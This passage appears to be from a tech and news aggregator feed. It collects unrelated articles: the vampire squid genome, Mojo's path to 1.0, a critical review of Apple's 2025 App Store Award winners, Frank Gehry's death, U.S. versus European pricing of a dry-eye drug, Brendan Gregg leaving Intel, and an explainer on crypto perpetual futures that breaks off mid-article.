  • 22.

    Autry AE

    ,

    Adachi M

    ,

    Nosyreva E

    ,

    Na ES

    ,

    Los MF

    ,

    Cheng PF

    , et al. NMDA receptor blockade at rest triggers rapid behavioural antidepressant responses . Nature . 2011 ; 475 (

    7354

    ): 91 5 . DOI: 10.1038/nature10130 . PMID: 21677641 ; PMCID: PMC3172695

  • 23.

    Duman RS

    ,

    Aghajanian GK

    ,

    Sanacora G

    ,

    Krystal JH

    . Synaptic plasticity and depression: new insights from stress and rapid-acting antidepressants . Nat Med . 2016 ; 22 (

    3

    ): 238 49 . DOI: 10.1038/nm.4050 . PMID: 26937618 ; PMCID: PMC5405628

  • 24.

    Baudrillard J

    . Simulacra and simulation .

    Ann Arbor

    :

    University of Michigan Press

    ; 1994 . 164 p.

Friday Squid Blogging: Vampire Squid Genome

Schneier
www.schneier.com
2025-12-05 22:06:14
The vampire squid (Vampyroteuthis infernalis) has the largest cephalopod genome ever sequenced: more than 11 billion base pairs. That’s more than twice as large as the biggest squid genomes. It’s technically not a squid: “The vampire squid is a fascinating twig tenaciously hanging ...
Original Article

The vampire squid ( Vampyroteuthis infernalis ) has the largest cephalopod genome ever sequenced: more than 11 billion base pairs. That’s more than twice as large as the biggest squid genomes.

It’s technically not a squid: “The vampire squid is a fascinating twig tenaciously hanging onto the cephalopod family tree. It’s neither a squid nor an octopus (nor a vampire), but rather the last, lone remnant of an ancient lineage whose other members have long since vanished.”

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

Tags:

Posted on December 5, 2025 at 5:06 PM 0 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.

The Path to Mojo 1.0

Lobsters
www.modular.com
2025-12-05 21:48:52
Comments...
Original Article

Just about three years ago, the Mojo language started its journey from little more than an idea. Mojo has sure grown up a lot since then , pushing the frontiers of today’s latest accelerators , powering MAX (which in turn drives world-leading AI models ), and being adopted by countless developers for a wide range of applications spanning from audio processing to bioinformatics . Today, we’re excited to talk about the next big step in Mojo’s journey: Mojo 1.0!

Our vision for Mojo 1.0

We recently published our vision for Mojo as a language and why Modular built it in the first place. To quote from that document:

Our vision for Mojo is to be the one programming language developers need to target diverse hardware—CPUs, GPUs, and other accelerators—using Python's intuitive syntax combined with modern systems programming capabilities.

Alongside that, we provided our roadmap for Mojo’s development , broken into conceptual phases for the language. Phase 1 leans into Mojo’s initial killer application: writing high-performance kernels for GPUs and CPUs in a powerful, expressive language. The growing number of people learning GPU programming for the first time with our Mojo GPU puzzles is one testament to the value Mojo brings in this area. Mojo has allowed Modular to rapidly get the most out of the latest accelerators on the market and fuels all of Modular’s AI workloads .

While we want Mojo to achieve its full roadmap potential over time, we also want to bring an epoch of stability to the Mojo development experience, and thus a 1.0 version. As such, Mojo will reach 1.0 once we complete the goals we’ve listed for Phase 1 in our roadmap , providing stability for developers seeking a high-performance CPU and GPU programming language.

Work is well underway for the remaining features and quality work we need to complete for this phase, and we feel confident that Mojo will get to 1.0 sometime in 2026. This will also allow us to open source the Mojo compiler as promised .

While we are excited about this milestone, this of course won’t be the end of Mojo development! Some commonly requested capabilities for more general systems programming won’t be completed for 1.0, such as a robust async programming model and support for private members. Read below for more information on that!

Why a 1.0 now?

A 1.0 version for Mojo makes sense now for several reasons: first, we’d like to establish an epoch of stability within the Mojo ecosystem. A vibrant and growing community has formed around Mojo, and more people are looking to build larger projects using it. To date, the rapid pace of change in Mojo and its libraries has been a challenge.

We want to make it much easier to maintain a Mojo project by giving developers the confidence that what they write today won’t break tomorrow. The introduction of semantic versioning, markers for stable and unstable interfaces, and an overall intentionality in language changes will provide an even more solid foundation for someone developing against Mojo 1.x.

Mojo packages that use stabilized APIs should keep building across the 1.x series, even as we continue to add in new features that don’t make 1.0 itself. This will let the growing number of community Mojo libraries interoperate, unlocking increasingly complex Mojo projects.

We’re excited to have more Mojicians come to the platform. Announcing a 1.0 for the language will be a sign to the rest of the world to come and try out Mojo, or to come back and see how it has grown since the last time they kicked the tires. That’s why it’s important to us to have an excellent documentation and tooling experience for new and returning developers.

Planning for Mojo 1.0 has also been hugely valuable to the Modular team, as it provides a forcing function for focus and prioritization. There’s so much that can be worked on when developing a language that it’s helpful to identify what we weren’t going to be able to do before 1.0. That lets us direct effort to making a more solid experience for what Mojo is great at today, and polish an initial set of features before adding more.

Regarding the Mojo standard library, we’ve planned to give sufficient time to run each new language feature through it. This lets us identify bugs or areas of improvement before we call a feature “done”. We also expect 1.0 to have relatively few library features “stabilized” and expand that scope over time incrementally.

What’s next after 1.0?

Mojo 1.0 will be a milestone to celebrate, but it is only a step in a much longer journey. There are many features that won’t quite make the 1.0 launch, some of which we plan to roll out incrementally in 1.x releases. Many of these features (e.g. a “match” statement and enums) will be backward compatible and won’t break existing code, so we can add them into 1.x releases.

That said, we know that Mojo 1.0 won’t be perfect! There are some important language features in Phase 2 of the Mojo language roadmap that will introduce breaking changes to the language and standard library. For example, the ability to mark fields “private” is essential to providing memory safety.

During the development of Mojo 1.x, we will announce plans for a source breaking Mojo 2.0, and will build support for it under an “experimental” flag to allow opt-in support to this language mode. This means the Mojo compiler will support both 1.x and 2.0 packages, and we aim to make them link compatible - just like C++’20 is source incompatible with C++’98, but developers can build hybrid ecosystems. We will then enable package-by-package migration from 1.x to 2.x over time when 2.0 converges and ships.

Right now we are laser-focused on getting 1.0 out the door, but we have great confidence we’ll be able to navigate this future transition smoothly. Mojo learns a lot great things from Python, as well as from things that didn’t go as well: we’ll do what we can to avoid a transition like Python 2 to 3!

Join the community and follow along!

Our work towards Mojo 1.0 will be done in the open, and we welcome feedback and pull requests that help make the language even better. There are some great ways to participate:

  • Check out the new language and library additions as they roll out on a nightly basis in our open-source modular repository.
  • Have detailed discussions about language and interface design in the Modular forum .
  • Visit our new community page for even more resources.

Mojo 1.0 will be a big step for the language in the year to come!

★ 2025 App Store Award Winners: Tiimo, Essayist, and Detail

Daring Fireball
daringfireball.net
2025-12-05 21:46:12
I did not enjoy them as much as Apple did....
Original Article

Apple, today: “ Announcing the 2025 App Store Awards ”:

This year’s winners represent the best-in-class apps and games we returned to again and again. We hope you enjoy them as much as we do.

I did not enjoy all of them as much as Apple did.

Tiimo

iPhone app of the year Tiimo bills itself as an “AI Planner & To-do” app that is designed with accommodations for people with ADHD and other neurodivergences. Subscription plans cost $12/month ($144/year) or $54/year ($4.50/month). It does not offer a native Mac app, and at the end of onboarding/account setup, it suggests their web app for use on desktop computers. When I went to the web app, after signing in with the “Sign in With Apple” account I created on the iPhone app, Tiimo prompted me to sign up for an annual subscription for $42/year ($3.50/month), or monthly for $10 ($120/year). The in-app subscriptions offer a 30-day free trial; the less expensive pay-on-the-web subscriptions only offer a 7-day free trial. The web app doesn’t let you do anything without a paid account (or at least starting a trial); the iOS app offers quite a bit of basic functionality free of charge.

From Apple’s own description for why it gave Tiimo the award :

Built to support people who are neurodivergent (and anyone distracted by the hum of modern life), Tiimo brought clarity to our busy schedules using color-coded, emoji-accented blocks. The calming visual approach made even the most hectic days feel manageable.

It starts by syncing everything in Calendar and Reminders, pulling in doctor’s appointments, team meetings, and crucial prompts to walk the dog or stand up and stretch. Instead of dumping it all into a jumbled list, the app gives each item meaning by automatically assigning it a color and an emoji. (Tiimo gave us the option to change the weightlifter emoji it added to our workout reminders, but its pick was spot on.)

While on the move with coffee in one hand and keys in the other, we sometimes talked to Tiimo with the Al chatbot feature to add new tasks or shift appointments. When we felt overwhelmed by our to-do list, Tiimo kept us laser-focused by bubbling up just high-priority tasks, while its built-in Focus timer (accessible from any to-do with a tap) saved us from the pitfalls of multitasking.

But Tiimo really stood out when we faced a big personal project, like getting our Halloween decorations up before Thanksgiving. With the help of Al, the app suggested all the smaller tasks that would get us there: gathering the decorations from the garage, planning the layout, securing the cobwebs, and doing a safety check.

Aside from the web app, Tiimo is iOS exclusive , with apps only for iPhone, iPad, and Apple Watch. No Android version. It seems to do a good job with native platform integration (Calendar integration is free; Reminders integration requires a subscription). Animations in the app feel slow to me, which makes the app itself feel slow. And, personally, I find Tiimo’s emphasis on decorating everything with emoji distracting and childish , not clarifying.

The app seems OK, but not award-worthy to me. But, admittedly, I’m not in the target audience for Tiimo’s ADHD/neurodivergent focus. I don’t need reminders to have coffee in the morning, start work, have dinner, or to watch TV at night, which are all things Tiimo prefilled on my Today schedule after I went through onboarding. As I write this sentence, I’ve been using Tiimo for five minutes, and it’s already prompted me twice to rate it on the App Store. Nope, wait, I just got a third prompt. That’s thirsty, and a little gross. (And, although I’m not an ADHD expert, three prompts to rate and review the app in the first 10 minutes of use strikes me as contrary to the needs of the easily distracted.)

Essayist

Mac app of the year Essayist bills itself as “The Word Processor designed for Academic Writing” (capitalization verbatim). Subscriptions cost $80/year ($6.67/month) or $10/month ($120/year). Its raison d’être is managing citations and references, and automatically formatting the entire document, including citations, according to a variety of standards (MLA, Chicago, etc.). Quoting from Apple’s own description of Essayist :

Essayist gives you an easy way to organize a dizzying array of primary sources. Ebooks, podcasts, presentations, and even direct messages and emails can be cataloged with academic rigor. Using macOS Foundation Models, Essayist extracts all the key info needed to use it as a source.

For example, paste a YouTube URL into an entry and Essayist automatically fills in the name of the video, its publication date, and the date you accessed it. Drag in an article as a PDF to have Essayist fill in the title, author, and more — and store the PDF for easy access. You can also search for the books and journal articles you’re citing right in the app.

Essayist is a document-based (as opposed to library-based) app, and its custom file format is a package with the adorable file extension “.essay”. The default font for documents is Times New Roman, and the only other option is, of all fonts, Arial — and you need an active subscription to switch the font to Arial. ( Paying money for the privilege to use Arial... Jiminy fucking christ. I might need a drink. ) I appreciate the simplicity of severely limiting font choices to focus the user’s attention on the writing, but offering Times New Roman and Arial as the only options means you’re left with the choice between “the default font’s default font” and “ font crime ”. The Essayist app itself has no Settings ; instead, it offers only per-document settings .

The app carries a few whiffs of non-Mac-likeness (e.g. the aforementioned lack of Settings, and some lame-looking custom alerts ). The document settings window refers to a new document, even after it has been saved with a name, as “Untitled” until you close and reopen the document. Reopened documents do not remember their window size and position. But poking around with otool , it appears to be written using AppKit, not Catalyst. I suspected the app might be Catalyst because there are companion iOS apps for iPhone and iPad, which seem to offer identical feature sets as the Mac app. Essayist uses a clever system where, unless you have a subscription, documents can only be edited on the device on which they were created , but you can open them read-only on other devices. That feels like a good way to encourage paying while giving you a generous way to evaluate Essayist free of charge. There is no Android, Windows, or web app version — it’s exclusive to Mac and iOS.

I’ve never needed to worry about adhering to a specific format for academic papers, and that’s the one and only reason I can see to use Essayist. In all other aspects, it seems a serviceable but very basic, almost primitive, word processor. There’s no support for embedding images or figures of any kind in a document, for example.

Detail

iPad app of the year Detail bills itself, simply and to the point, as an “AI Video Editor”. The default subscription is $70/year ($5.83/month) with a 3-day free trial; the other option is to pay $12/month ($144/year) with no free trial. After a quick test drive, Detail seems like an excellent video editing app, optimized for creating formats common on social media, like reel-style vertical videos where you, the creator, appear as a cutout in the corner, in front of the video or images that you’re talking about. The iPhone version seems equally good. The iPad version of Detail will install and run on MacOS, but it’s one of those “Designed for iPad / Not verified for macOS” direct conversions. But they do offer a standalone Mac app, Detail Studio , which is a real Mac app, written using AppKit, which requires a separate subscription to unlock pro features ($150/year or $22/month). Detail only offers apps for iOS and MacOS — no Windows, Android, or web.

From Apple’s own acclaim for Detail :

When we used Detail to record a conversation of two people sitting side by side, the app automatically created a cut that looked like it was captured with two cameras. It zoomed in on one speaker, then cut away to the other person’s reaction. The app also made it easy to unleash our inner influencer. We typed a few key points, and the app’s AI wrote a playful script that it loaded into its teleprompter so we could read straight to the camera.

Most importantly, Detail helped us memorialize significant life moments all while staying present. At a birthday party, we propped an iPad on a table and used Detail to record with the front and back cameras simultaneously. The result was a split-screen video with everyone singing “Happy Birthday” on the left and the guest of honor blowing out the candles on the right. (No designated cameraperson needed.)

Detail has a bunch of seemingly genuinely useful AI-based features. But putting all AI features aside, it feels like a thoughtful, richly featured manual video editor. I suspect that’s why the AI features might work well — they’re an ease-of-use / automation layer atop a professional-quality non-AI foundation. Basically, Detail seems like what Apple’s own Clips — recently end-of-life’d — should have been. It turns your iPad (or iPhone) into a self-contained video studio. Cool.


Of these three apps — Tiimo on iPhone, Essayist on Mac, and Detail on iPad — Detail appeals to me the most, and strikes me as the most deserving of this award. If I were to start making videos for modern social media, I’d strongly evaluate Detail as my primary tool.

Apple still has no standalone category for AI apps, but all three of these apps emphasize AI features, and Apple itself calls out those AI features in its praise for them. It’s an obvious recurring theme shared by all three, along with their shared monetization strategies of being free to download with in-app subscriptions to unlock all features, and the fact that all three winners are exclusive to iOS and Mac (and, in Tiimo’s case, the web).

Frank Gehry has died

Hacker News
www.bbc.co.uk
2025-12-05 21:31:40
Comments...
Original Article

Frank Gehry, one of the most influential architects of the last century, has died aged 96.

Gehry was acclaimed for his avant garde, experimental style of architecture. His titanium-covered design of the Guggenheim Museum in Bilbao, Spain, catapulted him to fame in 1997.

He built his daring reputation years before that when he redesigned his own home in Santa Monica, California, using materials like chain-link fencing, plywood and corrugated steel.

HIs death was confirmed by his chief of staff Meaghan Lloyd. He is survived by two daughters from his first marriage, Leslie and Brina; his wife, Berta Isabel Aguilera, and their two sons, Alejandro and Samuel,

Born in Toronto in 1929, Gehry moved to Los Angeles as a teenager to study architecture at the University of Southern California before completing further study at the Harvard Graduate School of Design in 1956 and 1957.

After starting his own firm, he broke from the traditional architectural principles of symmetry, using unconventional geometric shapes and unfinished materials in a style now known as deconstructivism.

"I was rebelling against everything," Gehry said in an interview with The New York Times in 2012.

His work in Bilbao put him in high demand, and he went on to design iconic structures in cities all over the world: the Jay Pritzker Pavilion in Chicago's Millennium Park, the Gehry Tower in Germany, and the Louis Vuitton Foundation in Paris.

"He bestowed upon Paris and upon France his greatest masterpiece," said Bernard Arnault, the CEO of LVMH, the worlds largest luxury goods company which owns Louis Vuitton.

With a largely unpredictable style, no two of his works look the same. Prague's Dancing House, finished in 1996, looks like a glass building folding in on itself; his Hotel Marques in Spain, built in 2006, features thin sheets of wavy, multicoloured metal; his design for a business school in Sydney looks like a brown paper bag .

Gehry won the coveted Pritzker Architecture Prize for lifetime achievement in 1989, when he was 60, with his work described as having a "highly refined, sophisticated and adventurous aesthetic".

"His designs, if compared to American music, could best be likened to Jazz, replete with improvisation and a lively unpredictable spirit," ther Pritzker jury said at the time.

Gehry was awarded the Order of Canada in 2002 and the Presidential Medal of Freedom, the highest civilian honour in the US, in 2016.

A $20 drug in Europe requires a prescription and $800 in the U.S.

Hacker News
www.statnews.com
2025-12-05 21:27:22
Comments...
Original Article

A month’s supply of Miebo, Bausch & Lomb’s prescription dry eye drug, costs $800 or more in the U.S. before insurance. But the same drug — sold as EvoTears — has been available over-the-counter (OTC) in Europe since 2015 for about $20. I ordered it online from an overseas pharmacy for $32 including shipping, and it was delivered in a week.

This is, of course, both shocking and unsurprising. A 2021 RAND study found U.S. prescription drug prices are, on average, more than 2.5 times higher than in 32 other developed nations. Miebo exemplifies how some pharmaceutical companies exploit regulatory loopholes and patent protections, prioritizing profits over patients, eroding trust in health care. But there is a way to fix this loophole.

In December 2019, Bausch & Lomb, formerly a division of Valeant, acquired the exclusive license for the commercialization and development in the United States and Canada for NOV03, now called Miebo in the U.S. Rather than getting an approval for an OTC drug, like it is in Europe, Bausch secured U.S. Food and Drug Administration approval as a prescription medication, subsequently pricing it at a high level. Currently, according to GoodRx, a monthly supply of Miebo will cost $830.27 at Walgreens, and it’s listed at $818.38 on Amazon Pharmacy .

The strategy has paid off: Miebo’s 2024 sales — its first full year — hit $172 million , surpassing the company’s projections of $95 million. The company now forecasts sales to exceed $500 million annually . At European prices, those sales would be less than $20 million. Emboldened with Miebo’s early success, Bausch & Lomb raised the price another 4% in 2025, according to the drug price tracking firm 46brooklyn.

Bausch & Lomb has a track record of prioritizing profits over patients. As Valeant, its business model was simple: buy, gut, gouge, repeat. In 2015, it raised prices for Nitropress and Isuprel by over 200% and 500% , respectively, triggering a 2016 congressional hearing. Despite promises of reform, little has changed. When he was at Allergan, Bausch & Lomb’s current CEO, Brent Saunders, pledged “ responsible pricing ” but tried to extend patent protection for Allergan’s drug Restasis (another dry eye drug) through a dubious deal with the Mohawk Indian tribe , later rejected by courts.

Now at Bausch & Lomb, Saunders oversaw Miebo’s launch, claiming earlier this year in an investor call, “We are once again an innovation company.” But finding a way to get an existing European OTC drug to be a prescription drug in the U.S. with a new name and a 40-fold price increase is not true innovation — it’s a price-gouging strategy.

Bausch & Lomb could have pursued OTC approval in the U.S., leveraging its expertise in OTC eye drops and lotions. However, I could not find in transcripts or presentations any evidence that Baush & Lomb seriously pursued this. Prescription status, however, ensures much higher prices, protected by patents and limited competition. Even insured patients feel the ripple effects: Coupons may reduce out-of-pocket costs, but insurers pay hundreds per prescription, driving up premiums and the overall cost of health care for everyone.

In response to questions from STAT about why Miebo is an expensive prescription drug, a representative said in a statement, “The FDA determined that MIEBO acts at the cellular and molecular level of the eye, which meant it had to go through the same rigorous process as any new pharmaceutical — a full New Drug Application. Unlike in Europe, where all medical device eye drops are prescription-free and cleared through a highly predictable and fast pathway, we were required to design, enroll and complete extensive clinical trials involving thousands of patients, and provide detailed safety and efficacy data submissions. Those studies took years and significant investment, but they ensure that MIEBO meets the highest regulatory standards for safety and effectiveness.”

Bausch & Lomb’s carefully worded response expertly sidesteps the real issue. The FDA’s test for OTC status isn’t a drug’s mechanism of action — it’s whether patients can use it safely without a doctor. Miebo’s track record as an OTC product in Europe for nearly a decade shows it meets that standard. Bausch & Lomb provides no evidence, or even assertion, that it ever tried for OTC approval in the U.S. Instead, it pursued the prescription route — not because of regulatory necessity, but as a business strategy to secure patents and command an $800 price. In doing so, B&L is weaponizing a regulatory loophole against American patients, prioritizing profit over access, and leaving their “significant investment” as the cost of monopoly, not medical necessity.

Even if you accept Bausch & Lomb’s self-serving rationale, the answer is not to allow the loophole to persist, but to close it. The FDA could require any drug approved as OTC internationally be considered for OTC status in the United States before greenlighting it as a prescription product — and mandate retroactive review of cases like Miebo.

The FDA’s OTC monograph process, which assesses the safety and efficacy of nonprescription drugs, makes this feasible, though it may need to be adjusted slightly. Those changes might involve incorporating a mechanism to make sure that overseas OTC status triggers a review of U.S. prescription drugs containing the same active ingredients or formulations for potential OTC designation; developing criteria to assess equivalency in safety and efficacy standards between U.S. OTC requirements and those of other countries; and establishing a retroactive review pathway within the monograph process to handle existing prescription drugs already marketed OTC internationally.

EvoTears thrives abroad without safety concerns, countering industry claims of stricter U.S. standards. This reform would deter companies from repackaging OTC drugs as high-cost prescriptions, fostering competition and lowering prices.

While this tactic isn’t widespread, it joins loopholes like late-listed patents, picket fence patents, or pay-for-delay generic deals that undermine trust in an industry whose employees largely aim to save lives.

Miebo also shows how global reference pricing could save billions. Aligning with European prices could cut consumer costs while reducing doctor visits, pharmacy time, and administrative burdens. For patients who skip doses to afford groceries, lower prices would mean better access and health. Reforms like the 2022 Inflation Reduction Act’s Medicare price negotiations set a precedent, but targeted rules are urgently needed.

Unexplained differences in drug prices between the U.S. and other wealthy countries erode the public’s trust in health care. Companies like Bausch & Lomb exploit systemic gaps, leaving patients and payers to foot exorbitant bills. An OTC evaluation rule, with retroactive reviews, is a practical first step, signaling that patient access takes precedence over corporate greed.

Let’s end the price-gouging practices of outliers and build a health care system that puts patients first. Just as targeting criminal outliers fosters a law-abiding society, holding bad pharmaceutical actors accountable is crucial for restoring trust and integrity to our health care system. While broader approaches to making health care more fair, accessible, and affordable are needed, sometimes the way to save billions is to start by saving hundreds of millions.

David Maris is a six-time No. 1 ranked pharmaceutical analyst with more than two decades covering the industry. He currently runs Phalanx Investment Partners , a family office; is a partner in Wall Street Beats ; and is co-author of the recently published book “ The Fax Club Experiment .” He is currently working on his next book about health care in America.

Leaving Intel

Hacker News
www.brendangregg.com
2025-12-05 21:27:04
Comments...
Original Article

I've resigned from Intel and accepted a new opportunity. If you are an Intel employee, you might have seen my fairly long email that summarized what I did in my 3.5 years. Much of this is public:

It's still early days for AI flame graphs. Right now when I browse CPU performance case studies on the Internet, I'll often see a CPU flame graph as part of the analysis. We're a long way from that kind of adoption for GPUs (and it doesn't help that our open source version is Intel only), but I think as GPU code becomes more complex, with more layers, the need for AI flame graphs will keep increasing.

I also supported cloud computing, participating in 110 customer meetings, and created a company-wide strategy to win back the cloud with 33 specific recommendations, in collaboration with others across 6 organizations. It is some of my best work and features a visual map of interactions between all 19 relevant teams, described by Intel long-timers as the first time they have ever seen such a cross-company map. (This strategy, summarized in a slide deck, is internal only.)

I always wish I did more, in any job, but I'm glad to have contributed this much especially given the context: I overlapped with Intel's toughest 3 years in history, and I had a hiring freeze for my first 15 months.

My fond memories from Intel include meeting Linus at an Intel event who said "everyone is using fleme graphs these days" (Finnish accent), meeting Pat Gelsinger who knew about my work and introduced me to everyone at an exec all hands, surfing lessons at an Intel Australia and HP offsite ( mp4 ), and meeting Harshad Sane (Intel cloud support engineer) who helped me when I was at Netflix and now has joined Netflix himself -- we've swapped ends of the meeting table. I also enjoyed meeting Intel's hardware fellows and senior fellows who were happy to help me understand processor internals. (Unrelated to Intel, but if you're a Who fan like me, I recently met some other people as well !)

My next few years at Intel would have focused on execution of those 33 recommendations, which Intel can continue to do in my absence. Most of my recommendations aren't easy, however, and require accepting change, ELT/CEO approval, and multiple quarters of investment. I won't be there to push them, but other employees can (my CloudTeams strategy is in the inbox of various ELT, and in a shared folder with all my presentations, code, and weekly status reports). This work will hopefully live on and keep making Intel stronger. Good luck.

Perpetual Futures

Hacker News
www.bitsaboutmoney.com
2025-12-05 21:23:03
Comments...
Original Article

Programming note : Bits about Money is supported by our readers . I generally forecast about one issue a month, and haven't kept that pace that this year. As a result, I'm working on about 3-4 for December.

Much financial innovation is in the ultimate service of the real economy. Then, we have our friends in crypto, who occasionally do intellectually interesting things which do not have a locus in the real economy. One of those things is perpetual futures (hereafter, perps), which I find fascinating and worthy of study, the same way that a virologist just loves geeking out about furin cleavage sites.

You may have read a lot about stablecoins recently. I may write about them (again; see past BAM issue ) in the future, as there has in recent years been some uptake of them for payments. But it is useful to understand that a plurality of stablecoins collateralize perps. Some observers are occasionally strategic in whether they acknowledge this, but for payments use cases, it does not require a lot of stock to facilitate massive flows. And so of the $300 billion or so in stablecoins presently outstanding , about a quarter sit on exchanges. The majority of that is collateralizing perp positions.

Perps are the dominant way crypto trades, in terms of volume. (It bounces around but is typically 6-8 times larger than spot .) This is similar to most traditional markets: where derivatives are available, derivative volume swamps spot volume. The degree to which depends on the market, Schelling points, user culture, and similar. For example, in India, most retail investing in equity is actually through derivatives; this is not true of the U.S. In the U.S., most retail equity exposure is through the spot market, directly holding stocks or indirectly through ETFs or mutual funds. Most trading volume of the stock indexes , however, is via derivatives.

Beginning with the problem

The large crypto exchanges are primarily casinos, who use the crypto markets as a source of numbers, in the same way a traditional casino might use a roulette wheel or set of dice. The function of a casino is for a patron to enter it with money and, statistically speaking, exit it with less. Physical casinos are often huge capital investments with large ongoing costs, including the return on that speculative capital. If they could choose to be less capital intensive, they would do so, but they are partially constrained by market forces and partially by regulation.

A crypto exchange is also capital intensive, not because the website or API took much investment (relatively low, by the standards of financial software) and not because they have a physical plant, but because trust is expensive. Bettors, and the more sophisticated market makers, who are the primary source of action for bettors, need to trust that the casino will actually be able to pay out winnings. That means the casino needs to keep assets (generally, mostly crypto, but including a smattering of cash for those casinos which are anomalously well-regarded by the financial industry) on hand exceeding customer account balances.

Those assets are… sitting there, doing nothing productive. And there is an implicit cost of capital associated with them, whether nominal (and borne by a gambler) or material (and borne by a sophisticated market making firm, crypto exchange, or the crypto exchange’s affiliate which trades against customers [0]).

Perpetual futures exist to provide the risk gamblers seek while decreasing the total capital requirement (shared by the exchange and market makers) to profitably run the enterprise.

Perps predate crypto but found a home there

In the commodities futures markets, you can contract to either buy or sell some standardized, valuable thing at a defined time in the future. The overwhelming majority of contracts do not result in taking delivery; they’re cancelled by an offsetting contract before that specified date.

Given that speculation and hedging are such core use cases for futures, the financial industry introduced a refinement: cash-settled futures. Now there is a reference price for the valuable thing, with a great deal of intellectual effort put into making that reference price robust and fair (not always successfully). Instead of someone notionally taking physical delivery of pork bellies or barrels of oil, people who are net short the future pay people who are net long the future on delivery day. (The mechanisms of this clearing are fascinating but outside today’s scope.)

Back in the early nineties economist Robert Shiller proposed a refinement to cash settled futures: if you don’t actually want pork bellies or oil barrels for consumption in April, and we accept that almost no futures participants actually do, why bother closing out the contracts in April? Why fragment the liquidity for contracts between April, May, June, etc? Just keep the market going perpetually .

This achieved its first widespread popular use in crypto (Bitmex is generally credited as being the popularizer), and hereafter we’ll describe the standard crypto implementation. There are, of course, variations available.

Multiple settlements a day

Instead of all of a particular futures vintage settling on the same day, perps settle multiple times a day for a particular market on a particular exchange. The mechanism for this is the funding rate . At a high level: winners get paid by losers every e.g. 4 hours and then the game continues, unless you’ve been blown out due to becoming overleveraged or for other reasons (discussed in a moment).

Consider a toy example: a retail user buys 0.1 Bitcoin via a perp. The price on their screen, which they understand to be for Bitcoin, might be $86,000 each, and so they might pay $8,600 cash. Should the price rise to $90,000 before the next settlement, they will get +/- $400 of winnings credited to their account, and their account will continue to reflect exposure to 0.1 units of Bitcoin via the perp. They might choose to sell their future at this point (or any other). They’ll have paid one commission (and a spread) to buy, one (of each) to sell, and perhaps they’ll leave the casino with their winnings, or perhaps they’ll play another game.

Where did the money come from? Someone else was symmetrically short exposure to Bitcoin via a perp. It is, with some very important caveats incoming, a closed system: since no good or service is being produced except the speculation, winning money means someone else lost.

One fun wrinkle for funding rates: some exchanges cap the amount the rate can be for a single settlement period. This is similar in intent to traditional markets’ usage of circuit breakers : designed to automatically blunt out-of-control feedback loops. It is dissimilar in that it cannot actually break circuits: changes to funding rate can delay realization of losses but can’t prevent them, since they don’t prevent the realization of symmetrical gains.

Perp funding rates also embed an interest rate component. This might get quoted as 3 bps a day, or 1 bps every eight hours, or similar. However, because of the impact of leverage, gamblers are paying more than you might expect: at 10X leverage that’s 30 bps a day. Consumer finance legislation standardizes borrowing costs as APR rather than basis points per day so that an unscrupulous lender can’t bury a 200% APR in the fine print.

Convergence in prices via the basis trade

Prices for perps do not, as a fact of nature, exactly match the underlying. That is a feature for some users.

In general, when the market is exuberant, the perp will trade above spot (the underlying market). To close the gap, a sophisticated market participant should do the basis trade : make offsetting trades in perps and spot (short the perp and buy spot, here, in equal size). Because the funding rate is set against a reference price for the underlying, longs will be paying shorts more (as a percentage of the perp’s current market price). For some of them, that’s fine: the price of gambling went up, oh well. For others, that’s a market incentive to close out the long position, which involves selling it, which will decrease the price at the margin (in the direction of spot).

The market maker can wait for price convergence; if it happens, they can close the trade at a profit, while having been paid to maintain the trade. If the perp continues to trade rich, they can just continue getting the increased funding cost. To the extent this is higher than their own cost of capital, this can be extremely lucrative.

Flip the polarities of these to understand the other direction.

The basis trade, classically executed, is delta neutral: one isn’t exposed to the underlying itself. You don’t need any belief in Bitcoin’s future adoption story, fundamentals, market sentiment, halvings, none of that. You’re getting paid to provide the gambling environment, including a really important feature: the perp price needs to stay reasonably close to the spot price, close enough to continue attracting people who want to gamble. You are also renting access to your capital for leverage.

You are also underwriting the exchange: if they blow up, your collateral becoming a claim against the bankruptcy estate is the happy scenario. (As one motivating example: Galois Capital, a crypto hedge fund doing basis trades, had ~40% of its assets on FTX when it went down. They then wound down the fund, selling the bankruptcy claim for 16 cents on the dollar .)

Recall that the market can’t function without a system of trust saying that someone is good for it if a bettor wins. Here, the market maker is good for it, via the collateral it kept on the exchange.

Many market makers function across many different crypto exchanges. This is one reason they’re so interested in capital efficiency: fully collateralizing all potential positions they could take across the universe of venues they trade on would be prohibitively capital intensive, and if they do not pre-deploy capital, they miss profitable trading opportunities. [1]

Leverage and liquidations

Gamblers like risk; it amps up the fun. Since one has many casinos to choose from in crypto, the ones which only “regular” exposure to Bitcoin (via spot or perps) would be offering a less-fun product for many users than the ones which offer leverage. How much leverage? More leverage is always the answer to that question, until predictable consequences start happening.

In a standard U.S. brokerage account, Regulation T has, for almost 100 years now, set maximum leverage limits (by setting minimums for margins). These are 2X at position opening time and 4X “maintenance” (before one closes out the position). Your brokerage would be obligated to forcibly close your position if volatility causes you to exceed those limits.

As a simplified example, if you have $50k of cash, you’d be allowed to buy $100k of stock. You now have $50k of equity and a $50k loan: 2x leverage. Should the value of that stock decline to about $67k, you still owe the $50k loan, and so only have $17k remaining equity. You’re now on the precipice of being 4X leveraged, and should expect a margin call very soon, if your broker hasn’t “blown you out of the trade” already.

What part of that is relevant to crypto? For the moment, just focus on that number: 4X.

Perps are offered at 1X (non-levered exposure). But they’re routinely offered at 20X, 50X, and 100X. SBF, during his press tour / regulatory blitz about being a responsible financial magnate fleecing the customers in an orderly fashion , voluntarily self-limited FTX to 20X .

One reason perps are structurally better for exchanges and market makers is that they simplify the business of blowing out leveraged traders. The exact mechanics depend on the exchange, the amount, etc, but generally speaking you can either force the customer to enter a closing trade or you can assign their position to someone willing to bear the risk in return for a discount.

Blowing out losing traders is lucrative for exchanges except when it catastrophically isn’t. It is a priced service in many places. The price is quoted to be low ( “a nominal fee of 0.5% ” is one way Binance describes it) but, since it is calculated from the amount at risk, it can be a large portion of the money lost. If the account’s negative balance is less than the liquidation fee, wonderful, thanks for playing and the exchange / “the insurance fund” keeps the rest, as a tip.

In the case where the amount an account is negative by is more than the fee, that “insurance fund” can choose to pay the winners on behalf of the liquidated user, at management’s discretion. Management will usually decide to do this, because a casino with a reputation for not paying winners will not long remain a casino.

But tail risk is a real thing. The capital efficiency has a price : there physically does not exist enough money in the system to pay all winners given sufficiently dramatic price moves. Forced liquidations happen. Sophisticated participants withdraw liquidity (for reasons we’ll soon discuss) or the exchange becomes overwhelmed technically / operationally. The forced liquidations eat through the diminished / unreplenished liquidity in the book, and the magnitude of the move increases.

